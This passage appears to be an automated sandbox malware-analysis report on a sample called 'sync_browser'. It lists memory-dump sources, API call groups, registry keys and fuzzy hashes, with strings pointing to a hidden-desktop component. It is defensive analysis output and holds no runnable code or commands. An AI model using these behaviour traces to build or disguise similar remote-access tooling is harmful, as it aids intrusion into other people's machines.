                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: DeleteObjectfree$ErrorFreeHeapLast_errno
                                                                    • String ID:
                                                                    • API String ID: 2426525106-0
                                                                    • Opcode ID: 519421b3b674e42368a913bd218afa9024c234a5df41dca482dc94a54fba9521
                                                                    • Instruction ID: 260fb4002de56f00b92acd910662e2b1d5c2af2a3b6d70406f46f46685de81ed
                                                                    • Opcode Fuzzy Hash: 519421b3b674e42368a913bd218afa9024c234a5df41dca482dc94a54fba9521
                                                                    • Instruction Fuzzy Hash: 3FF0B2A2A18A41C1EB54FF75E891478A338FF88F84B804031CE1D82379CF28E896C360
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: DeleteObjectfree$ErrorFreeHeapLast_errno
                                                                    • String ID:
                                                                    • API String ID: 2426525106-0
                                                                    • Opcode ID: ed0781dc8889168bce117aea87ed44a54f9bb397e4d36f2ca679cd736364b467
                                                                    • Instruction ID: 260fb4002de56f00b92acd910662e2b1d5c2af2a3b6d70406f46f46685de81ed
                                                                    • Opcode Fuzzy Hash: ed0781dc8889168bce117aea87ed44a54f9bb397e4d36f2ca679cd736364b467
                                                                    • Instruction Fuzzy Hash: 3FF0B2A2A18A41C1EB54FF75E891478A338FF88F84B804031CE1D82379CF28E896C360
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Library$AddressFreeLoadProc
                                                                    • String ID: EnumDisplayDevicesA$USER32
                                                                    • API String ID: 145871493-2970514552
                                                                    • Opcode ID: ce794e2cbdb766f9e1c0efda30611b8e823122e68f144a872fe4c48864dd2d5a
                                                                    • Instruction ID: 28c4ccf95f6fc83a0b257f6def13b1ec04848df69a660f8e8181915fd2684e74
                                                                    • Opcode Fuzzy Hash: ce794e2cbdb766f9e1c0efda30611b8e823122e68f144a872fe4c48864dd2d5a
                                                                    • Instruction Fuzzy Hash: 5431B33260CF82C5EA60FB15B444AA9A2A4FF85794F950135DE9D037A8EF3CF801C720
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Library$AddressFreeLoadProc
                                                                    • String ID: EnumDisplayDevicesA$USER32
                                                                    • API String ID: 145871493-2970514552
                                                                    • Opcode ID: c302339970f6293fc38423b47487169b7c7610065756fe4ae123da4c8d70ed68
                                                                    • Instruction ID: c82fc8ff66d2a18cc381b9a05d1ac379528b1be69903725090327f58629e5f43
                                                                    • Opcode Fuzzy Hash: c302339970f6293fc38423b47487169b7c7610065756fe4ae123da4c8d70ed68
                                                                    • Instruction Fuzzy Hash: FF31723260CB86C5E760FB15F4446A9A3A0FB89B94F950235DE9D137A8DF3CE501D720
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Library$AddressFreeLoadProc
                                                                    • String ID: EnumDisplayDevicesA$USER32
                                                                    • API String ID: 145871493-2970514552
                                                                    • Opcode ID: d63241eccbf7de335e5bf3da54cc8ef173d0710342ef8f715da4294a33c1ad9f
                                                                    • Instruction ID: 54196da7bbb53eb425e3637723bf333f7b069d0d4f74a33dfeb6337685db07b1
                                                                    • Opcode Fuzzy Hash: d63241eccbf7de335e5bf3da54cc8ef173d0710342ef8f715da4294a33c1ad9f
                                                                    • Instruction Fuzzy Hash: 4031843261CB81C5EA60FB15F4446A9A7A4FB89B94F950235DE9D037A9DF3CE501CB20
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseOpenQueryValue
                                                                    • String ID: CSDVersion$Software\Microsoft\Windows NT\CurrentVersion
                                                                    • API String ID: 3677997916-605553437
                                                                    • Opcode ID: e687beb703156b10d4b9a4dc2033f7a7f464ba5dff228a3a31641666442cd2e3
                                                                    • Instruction ID: 5fdc35f026ddc8454affc6b16f3579a06accae2ecd0c2714a5369f614fb9d0fc
                                                                    • Opcode Fuzzy Hash: e687beb703156b10d4b9a4dc2033f7a7f464ba5dff228a3a31641666442cd2e3
                                                                    • Instruction Fuzzy Hash: 65314F61A1D682C1FB60BB20F45077AA7A0FB85754F801232F6DE56BA8DF2DF444CB20
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Library$AddressFreeLoadProc
                                                                    • String ID: EnumDisplayDevicesA$USER32
                                                                    • API String ID: 145871493-2970514552
                                                                    • Opcode ID: 20b902f79b4c6cb6d22b363d0868b8f0204c862da4352ce45faa7478bd25a1e0
                                                                    • Instruction ID: 58b5b076e62f7194374dcf413b1543b3bb8bc0a72bdd3dbafaa93ad0405db367
                                                                    • Opcode Fuzzy Hash: 20b902f79b4c6cb6d22b363d0868b8f0204c862da4352ce45faa7478bd25a1e0
                                                                    • Instruction Fuzzy Hash: B8218132B1CB41C2E760FF11B4446A9A3A0FB88794F850135DAAD537A8DF3CE4018750
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Library$AddressCreateFreeInfoInitializeInstanceLoadParametersProcSystem
                                                                    • String ID: HideDesktop.cpp : Restorewallpaper %i$HideDesktop.cpp : Restorewallpaper %i %i$shell32.dll
                                                                    • API String ID: 3848869850-2975526927
                                                                    • Opcode ID: 86e18f80a34eacc762fd4aea0dba914ccb49a3b135e5f10d2f504f448b0c5f0f
                                                                    • Instruction ID: 095091521cfa2937c6c69fba42205d39fe07ce3e63ea93fa4baea3e29d71752a
                                                                    • Opcode Fuzzy Hash: 86e18f80a34eacc762fd4aea0dba914ccb49a3b135e5f10d2f504f448b0c5f0f
                                                                    • Instruction Fuzzy Hash: 42111574E0D603C1FA54BB20B8146B9A3A1BF95348FC44036C44D563B9DE3CB60ACB72
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseOpenQueryValue
                                                                    • String ID: System\CurrentControlSet\Control\Terminal Server$TSAppCompat
                                                                    • API String ID: 3677997916-252502655
                                                                    • Opcode ID: 04d61c28986da10210dbcfa3cf5e3dc0138d519c330a05b731dc0905639135b6
                                                                    • Instruction ID: 68cef6b64264af6cddb6442dea9069a60321ec67ba5b106b388cc08efedcff34
                                                                    • Opcode Fuzzy Hash: 04d61c28986da10210dbcfa3cf5e3dc0138d519c330a05b731dc0905639135b6
                                                                    • Instruction Fuzzy Hash: 26015E71A1CB86C6EB50AB61F44475AF764FB84798F800131EA9D06B78DF7CE158CB10
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseOpenQueryValue
                                                                    • String ID: Installed$System\WPA\MediaCenter
                                                                    • API String ID: 3677997916-3461404619
                                                                    • Opcode ID: 554435a057f14dda37f7a57cb3d76111e403ad3072006c26abcf41054863a4ac
                                                                    • Instruction ID: 05bf56a139bf04dfdec3bfa5c918708b2938d5d03a3cd15374c783d0cbd324d7
                                                                    • Opcode Fuzzy Hash: 554435a057f14dda37f7a57cb3d76111e403ad3072006c26abcf41054863a4ac
                                                                    • Instruction Fuzzy Hash: 40016172A2CB82C2EB50AF21F44475AB764FB84794F800132EA8E06B68DF3CE144CB10
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseOpenValue
                                                                    • String ID: Control Panel\Desktop$WallpaperStyle
                                                                    • API String ID: 779948276-747434185
                                                                    • Opcode ID: 86799752d3e54857d2eafa99cacc6ace5413f974bbce5436984941c6bb35b0a9
                                                                    • Instruction ID: 63b852d8c033f3c74e2f080fca63b67dadf67d3f634d001c9d95d21f333fd3ba
                                                                    • Opcode Fuzzy Hash: 86799752d3e54857d2eafa99cacc6ace5413f974bbce5436984941c6bb35b0a9
                                                                    • Instruction Fuzzy Hash: F4012135A1CA52C2D710AB24F844559B3A0FB857E4F805321E96D43BE8DF2DE504CB14
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseOpenQueryValue
                                                                    • String ID: Control Panel\Desktop$WallpaperStyle
                                                                    • API String ID: 3677997916-747434185
                                                                    • Opcode ID: 8f2748f2ab4e4755b02a530358349d128b83dd3c8b3fdf60e15f7253ce60a2a6
                                                                    • Instruction ID: 3d3970a2e13f07a103b7f3a982a3ca15f3c778228b0eacc8a135ead758f1642a
                                                                    • Opcode Fuzzy Hash: 8f2748f2ab4e4755b02a530358349d128b83dd3c8b3fdf60e15f7253ce60a2a6
                                                                    • Instruction Fuzzy Hash: 73F01935A0CA43C1EB10AB24F85465AA764FB85789FD00231DA8D03B78DF3DE159CB10
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _amsg_exit_errno_getptd_invalid_parameter_noinfo
                                                                    • String ID:
                                                                    • API String ID: 1050512615-0
                                                                    • Opcode ID: 59d3a9a0c59e1ee59521e481f79702260e81d2ffae729b60c0b2a618ea284cda
                                                                    • Instruction ID: b131d858b9de1526ab05a25731d7bcb26e54d13aeb11c3ef6318f44e8dd0af6b
                                                                    • Opcode Fuzzy Hash: 59d3a9a0c59e1ee59521e481f79702260e81d2ffae729b60c0b2a618ea284cda
                                                                    • Instruction Fuzzy Hash: FF71C112A0C2D2D5F7697A75954097CABA4AB03B84F9C8431EE5D067AECF2CF851D321
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FlushObjectSelect
                                                                    • String ID:
                                                                    • API String ID: 2071645339-0
                                                                    • Opcode ID: aae6b1b2f4783f6f5e23d49270f9574a5a39ea57b095736f451dd763dd412b48
                                                                    • Instruction ID: 86ba8e12a5b039d607a1709c51e532ee24c6d6f91f3dc61ecb51028c9d702d78
                                                                    • Opcode Fuzzy Hash: aae6b1b2f4783f6f5e23d49270f9574a5a39ea57b095736f451dd763dd412b48
                                                                    • Instruction Fuzzy Hash: 41518E72A1D682CBE761BF25E0143A9BB90EB84B84F981136DA490776DCF3CF541CB21
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
